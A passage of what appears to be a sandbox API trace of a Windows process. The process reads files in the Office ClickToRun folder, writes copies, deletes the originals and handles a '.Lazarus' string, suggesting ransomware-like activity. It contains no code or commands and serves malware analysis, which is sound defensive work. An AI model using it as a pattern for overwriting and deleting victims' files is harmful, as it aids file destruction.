lpOverlapped=0x0) returned 1 [0090.773] GetLastError () returned 0x0 [0090.773] SetLastError (dwErrCode=0x0) [0090.773] GetLastError () returned 0x0 [0090.773] SetLastError (dwErrCode=0x0) [0090.773] GetLastError () returned 0x0 [0090.773] SetLastError (dwErrCode=0x0) [0090.773] GetLastError () returned 0x0 [0090.773] SetLastError (dwErrCode=0x0) [0090.773] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.773] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.774] GetLastError () returned 0x0 [0090.774] SetLastError (dwErrCode=0x0) [0090.774] GetLastError () returned 0x0 [0090.774] SetLastError (dwErrCode=0x0) [0090.774] GetLastError () returned 0x0 [0090.774] SetLastError (dwErrCode=0x0) [0090.774] GetLastError () returned 0x0 [0090.774] SetLastError (dwErrCode=0x0) [0090.774] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.774] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.775] GetLastError () returned 0x0 [0090.775] SetLastError (dwErrCode=0x0) [0090.775] GetLastError () returned 0x0 [0090.775] SetLastError (dwErrCode=0x0) [0090.775] GetLastError () returned 0x0 [0090.775] SetLastError (dwErrCode=0x0) [0090.775] GetLastError () returned 0x0 [0090.775] SetLastError (dwErrCode=0x0) [0090.775] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.775] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.775] GetLastError () returned 0x0 [0090.775] SetLastError (dwErrCode=0x0) [0090.776] GetLastError () returned 0x0 [0090.776] SetLastError (dwErrCode=0x0) [0090.776] GetLastError () returned 0x0 [0090.776] SetLastError (dwErrCode=0x0) [0090.776] GetLastError () returned 0x0 [0090.776] SetLastError (dwErrCode=0x0) [0090.776] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0xc0, lpOverlapped=0x0) returned 1 [0090.776] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.776] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.776] GetLastError () returned 0x0 [0090.776] SetLastError (dwErrCode=0x0) [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0090.777] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327ef70*=0xc0, lpOverlapped=0x0) returned 1 [0090.777] GetLastError () returned 0x0 [0090.777] SetLastError (dwErrCode=0x0) [0090.777] GetLastError () returned 0x0 [0090.777] SetLastError (dwErrCode=0x0) [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.777] CloseHandle (hObject=0x360) returned 1 [0090.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.779] CloseHandle (hObject=0x33c) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.779] AreFileApisANSI () returned 1 [0090.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0090.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.781] GetFileType (hFile=0x33c) returned 0x1 [0090.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.819] GetLastError () returned 0xb7 [0090.819] SetLastError (dwErrCode=0xb7) [0090.826] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.856] CloseHandle (hObject=0x33c) returned 1 [0090.856] AreFileApisANSI () returned 1 [0090.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0090.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.857] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0090.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.858] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.859] AreFileApisANSI () returned 1 [0090.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 91 [0090.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.860] AreFileApisANSI () returned 1 [0090.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0090.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.860] GetFileType (hFile=0x33c) returned 0x1 [0090.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.860] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.861] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.861] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.861] CloseHandle (hObject=0x33c) returned 1 [0090.865] AreFileApisANSI () returned 1 [0090.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0090.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.865] GetFileType (hFile=0x33c) returned 0x1 [0090.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.866] CloseHandle (hObject=0x33c) returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0090.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.867] AreFileApisANSI () returned 1 [0090.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0090.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.867] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.867] AreFileApisANSI () returned 1 [0090.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.868] RtlAllocateHeap 